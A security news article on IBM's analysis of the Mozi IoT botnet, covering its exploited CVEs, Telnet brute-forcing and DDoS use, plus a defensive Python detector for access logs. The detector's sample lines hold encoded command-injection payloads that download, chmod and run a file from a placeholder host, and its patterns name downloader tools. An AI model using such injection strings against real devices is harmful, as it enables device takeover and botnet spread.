IBM experts discovered the Mozi botnet, which is based on Mirai and Gafgyt code. The researchers claim that this botnet generated 90% of all IoT traffic between October 2019 and June 2020. Over the same period, the number of recorded IoT attacks was 400% higher than the total number of IoT attacks over the previous two years.
The researchers note that the significant increase in IoT attacks could also be attributed to the large number of IoT devices, of which there are already approximately 31 billion worldwide. In addition, Mozi did not try to remove other competing botnets from this "market", it was simply so active that it overshadowed them.
The analysts have been watching Mozi for four years and describe it as a P2P botnet based on the Distributed Hash Table (DHT) protocol that spreads through exploits and weak passwords (via Telnet). Mozi's success is attributed to the fact that it exploits command injection and misconfigurations of IoT devices. Almost all of the attacks studied began with command injection followed by a wget download; the malware then changed file permissions to facilitate interaction between the attackers and the affected system.
The attacks mainly targeted the MIPS architecture: the mozi.a file was downloaded to vulnerable devices and then launched.
To infect devices, Mozi exploits many different vulnerabilities: CVE-2017-17215 (Huawei HG532), CVE-2018-10561 and CVE-2018-10562 (GPON routers), CVE-2014-8361 (Realtek SDK), CVE-2008-4873 (Sepal SPBOARD), CVE-2016-6277 (Netgear R7000 / R6400), CVE-2015-2051 (D-Link devices), command injection in Eir D1000 wireless routers, unauthenticated RCE in Netgear setup.cgi, command execution in MVPower DVRs, D-Link UPnP SOAP command execution, and an RCE bug affecting several CCTV-DVR vendors. As mentioned above, it also brute-forces credentials over Telnet using a previously prepared wordlist.
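The infection chain described in the two paragraphs above (command injection, a wget download, a permission change, execution of the dropped file, with mozi.a as the payload name) is visible in a device's or reverse proxy's HTTP access log. The following is an added detection example, not code from IBM's report or from the Mozi analysis; the log lines are constructed, the IP addresses, paths and hostnames are placeholders, and the indicator list and alert threshold are assumptions chosen for illustration. It URL-decodes each request target twice (so double-encoded metacharacters are not missed), counts how many stages of the chain appear, and alerts when at least two are present or the Mozi payload name is seen, while a benign request that merely contains the word "wget" stays below the threshold.

```python
import re
from urllib.parse import unquote

# Constructed sample lines in Combined Log Format (not from the article).
# 203.0.113.9 and 198.51.100.7 are documentation addresses used as placeholders.
SAMPLE_LOG = [
    '198.51.100.7 - - [12/Jun/2020:10:01:02 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [12/Jun/2020:10:01:03 +0000] "GET /search?q=wget%20tutorial HTTP/1.1" 200 88 "-" "Mozilla/5.0"',
    # Single-encoded command injection: download mozi.a, chmod it, run it.
    '203.0.113.9 - - [12/Jun/2020:10:01:06 +0000] "GET /cgi-bin/app?cmd=ls%3Bwget%20http%3A%2F%2F203.0.113.9%2Fmozi.a%3Bchmod%20777%20mozi.a%3B.%2Fmozi.a HTTP/1.1" 404 0 "-" "-"',
    # Double-encoded variant (%253B decodes to %3B, then to ';').
    '203.0.113.9 - - [12/Jun/2020:10:01:09 +0000] "GET /cgi/set?val=1%253Bwget%2520http%253A%252F%252F203.0.113.9%252Fbin.sh%253Bsh%2520bin.sh HTTP/1.1" 404 0 "-" "-"',
]

# Fields of the Combined Log Format that the detector needs.
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)

# One indicator per stage of the chain the article describes. Assumed set,
# tune to your environment.
INDICATORS = {
    "shell_metachar": re.compile(r'[;|`]|\$\(|&&'),
    "downloader": re.compile(r'\b(?:wget|curl|tftp|ftpget)\b', re.I),
    "chmod": re.compile(r'\bchmod\b', re.I),
    "exec_dropped": re.compile(r'(?:^|[;&|\s])(?:\./|sh\s+)\S+'),
    "mozi_filename": re.compile(r'\bmozi\.[a-z]\b', re.I),  # payload name from the report
}

# Assumed threshold: a single indicator (e.g. the word "wget" in a search
# query) is too noisy on its own; two stages of the chain together are not.
ALERT_THRESHOLD = 2


def decode_target(target: str) -> str:
    """URL-decode twice so double-encoded metacharacters are still seen."""
    return unquote(unquote(target))


def analyze_line(line: str):
    """Return a finding dict for a parseable log line, or None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    decoded = decode_target(m.group("target"))
    hits = [name for name, rx in INDICATORS.items() if rx.search(decoded)]
    return {
        "client": m.group("client"),
        "timestamp": m.group("ts"),
        "target": decoded,
        "indicators": hits,
        "alert": len(hits) >= ALERT_THRESHOLD or "mozi_filename" in hits,
    }


def scan(lines):
    """Return only the findings that crossed the alert threshold."""
    findings = []
    for line in lines:
        result = analyze_line(line)
        if result and result["alert"]:
            findings.append(result)
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f["client"], f["indicators"], f["target"])
```

Run against the constructed lines, the scan flags only the two requests from 203.0.113.9 and reports which stages each one contained, which is the level of detail an analyst needs to distinguish a full infection attempt from a lone keyword hit. The same decode-then-score approach applies to the Telnet brute-force vector mentioned above, where the signal is instead repeated failed logins per source within a short window.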
As a result, Mozi can use infected devices to launch DDoS attacks (HTTP, TCP, UDP), command execution attacks, can download and execute additional payloads, and can also collect information about its bots.
The researchers write that they are increasingly seeing attacks on corporate IoT devices and remind organizations to change the devices' default settings.